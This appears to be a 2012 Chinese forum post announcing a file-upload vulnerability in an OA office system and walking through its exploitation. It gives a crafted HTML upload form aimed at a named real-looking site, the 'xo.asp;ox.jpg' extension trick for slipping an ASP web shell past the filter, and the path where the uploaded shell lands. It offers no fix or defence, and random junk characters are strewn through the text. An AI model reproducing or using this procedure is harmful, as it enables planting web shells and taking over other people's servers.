全能OA办公系统 上传漏洞( d3 n9 U/ D/ Y& }3 L: H' Y( m
! Q5 Z" {3 @7 _系统介绍:
' @3 f2 N1 U! E7 P9 Z, `7 M+ A. T1 @
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。! G: V2 X) y1 G! w3 n
& F3 ^" g6 S& T% I3 \9 ~7 \5 h主要功能:& u3 h& _' A1 h+ I* U1 S
公司通告 * m' y' K0 b: ?* x; _+ {% G
工作计划 , i ]. L# J, X( ^9 v" F
通讯助理 2 b% F T- M; w# K' p
客户资源
# N, u! \+ U1 g5 S2 n1 v7 g我的公文
$ a0 W4 a8 | F# x! l公文传阅
8 Y; ]0 n) _% {$ q5 N8 L公共资源
, M( Y- e. \6 L1 X* f0 j4 u" p8 j: w, h资源预约
5 n5 g) P9 v4 A! ~& ` z8 B今日考勤 5 h8 [ |) K" \: S" K2 F0 r
个人计划 " N" F; O$ O5 u! g9 U6 u- z1 M
个人通讯录
6 J# E1 z( y( z1 e2 N$ y8 t% F个人基本档案
3 F, m/ S0 g! N, K2 [2 n: h3 K3 ^未读邮件
1 M6 }& x8 O# h ]4 I2 V/ E- `$ I发邮件
* x6 w m& t- E收件夹 . S8 x- c2 ~; i3 q% r
寄件夹 " {. |0 W( ^- e- @
网络硬盘
5 P% p9 m( x) n3 l: n0 _3 X3 t网络会议
% r( t) B4 J* Q2 W! Y- N, T- w网络调查
E# K; d) s; ?( r6 I" D$ k; ^交流论坛
3 u0 H: w/ S1 }+ W; H7 j5 |( f! D4 s# p( U
有兴趣测试的朋友可以下源码看看
- K s. K* H% P9 n
# O: k. Z+ r" P1 z. s源码下载:3 B/ K7 s# X, X5 I- V3 x
; |. L+ |7 n( b1 ]/ ~5 t& |http://www.mycodes.net/30/4750.htm
# F' E+ o1 }5 q
: |& o+ W9 L( H) O+ a漏洞介绍:. l; a \0 v9 q) G0 Z1 q6 D3 @% |6 i
8 `4 G8 {( T* r
由upfile.asp上传文件漏洞引起
/ S5 l8 t0 p9 a S2 Q6 R' E5 ?, a( T; P2 @ H5 o: U
测试方法:+ ]. T2 Q- v6 x! O
8 x$ Z, ]7 U/ N {! D+ `/ F5 K使用名小子上传http://www.itlynn.com/upfile.asp即可
7 A7 H2 w; {4 c4 \2 c' J$ r$ j* p, a9 `, G& z
如果upfile.asp文件被删除不存在。
9 z1 K, J( F/ u
7 z: ^: p. Z" Q* E 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。" Z: H5 B! V! e; c2 |
7 I3 T7 X" I0 q9 @" p
如果存在那么将如下代码保存为upfile.html。" Y. ~# F5 N; {+ t7 o" a; n; e8 k3 X
: H2 S3 I/ R/ v' |1 T. K0 u! Y然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。" E4 E" W+ ^* J
9 ]) Q( m- w5 B
8 M8 P, [, r* u% C- X- z' A
! k/ |/ g; z% v+ ?
01 <table border='0' align="center" cellpadding="5">
' j, `+ l4 A" J7 J; }' d
+ ]" E+ t. E( E) G) \02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> # k' m) d% X6 U6 b
: ~ ^. o: I8 z03 <tr> ) G4 b) j% f7 s8 y
: t- Z/ X. e. h8 H Y# O04 <td>报错:</td> - m3 o2 L3 P W. [
' F5 o4 e D0 E05 <td><input type='radio' name='errnumber' value='0'>
2 J9 E/ L- A' b8 x2 l, h$ @
* X& _. x. H" c! u3 M/ T06 自动更名
, O4 U( ?% H8 G
* I, U: _ G: n07 <input type='radio' name='errnumber' value='1' checked>
; }5 Z1 w7 A0 F( ]1 r# b8 m9 Y1 K% A( j" s/ \
08 报错方式
4 m, Z' T, H) k, t+ k V6 P9 @+ w
09 <input type='radio' name='errnumber' value='2'> 9 {' ~; q0 N1 E; i3 r
" W5 C/ y7 i( @* b+ A* |; A0 t3 x10 直接覆盖</td>
1 w0 o# S4 X0 f) {
" U/ w/ O1 R% s" T& e11 </tr> 4 s4 i9 M4 _9 e
* w. h) v. ]0 d
12 <tr> ( E j I0 }0 X% Q; D g
! `2 q0 Y3 `8 L, p$ M3 @4 g
13 <td>主题:</td>
: X: I) ^) [( c s( }' C' E) ~* M) P- S. \$ g8 q6 l" \
14 <td><input type='text' name='filename' size='30'></td>
* A: ?2 L/ U9 a( Y- e( B& i
' y2 D B u; H. b15 </tr>
# p# M5 Z8 W' g2 \
/ [1 [& a3 \. O+ C3 B16 <tr>
* B8 A7 c7 M/ f J
& q# O1 ] N( e# i: I6 Y! w b17 <td>文件:</td>
$ ^( `8 Z' `/ h& @+ F
6 G0 F" Z) U& c9 m& ^3 z18 <td><input type="file"name="fruit"size="30"></td> 2 l- Z% K; v& m; R: H2 c, I: b
7 F+ Y) }$ A% h' B
19 </tr>
+ M% g2 ?1 _7 C# ^
, i, J2 [4 A( e/ K20 <tr> 1 t% p7 c, ]8 Z- d+ ~
( u+ f& _0 p* @% c21 <td valign='top'>简介:</td> . U" p3 U$ w; a+ n' K
" o( B6 H1 y. W1 u; j7 V2 \& j
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
2 V6 [& j5 N O k5 F- m4 J3 w, l/ R" L* E5 y% h+ ?; N8 H/ C
23 </tr> 5 Z# U9 l4 `7 N. B6 U. q
4 U# H Z e' E, ~
24
% S2 p9 N8 b3 L# l, c
5 N' K4 H8 d: a' Y+ W. ~! q6 p25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 9 u: U+ u/ x- f# `: a& |3 r6 q
9 I% g& o ^3 ~' Z26 </tr>
3 P3 G$ @5 M5 x4 f9 ^& q& f+ U0 X$ }, [
27 </form>
% I) e, P, Q: v4 J G1 K3 k* A
: B1 ?$ b% Z g6 V然后打开上传一个文件名为xo.asp;ox.jpg的文件。* z& O: Y7 W3 J$ }0 ~0 f
, z y6 B, Z4 `2 ?7 R/ b8 \8 e I
4 e7 I4 Y& f8 X Z( a [6 T _8 z. u: V0 P) {& z0 o. V8 \) X1 t
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
0 f0 M* c% m( X8 @+ a H3 t- }; c. B& W0 i# h5 D
此漏洞需要配合解析漏洞利用。/ v. g7 I: r7 p4 T: y8 ]' _
& S. ^" m( H4 o5 q" k/ C
|
发表于 2012-11-21 13:45:12
收藏
支持
反对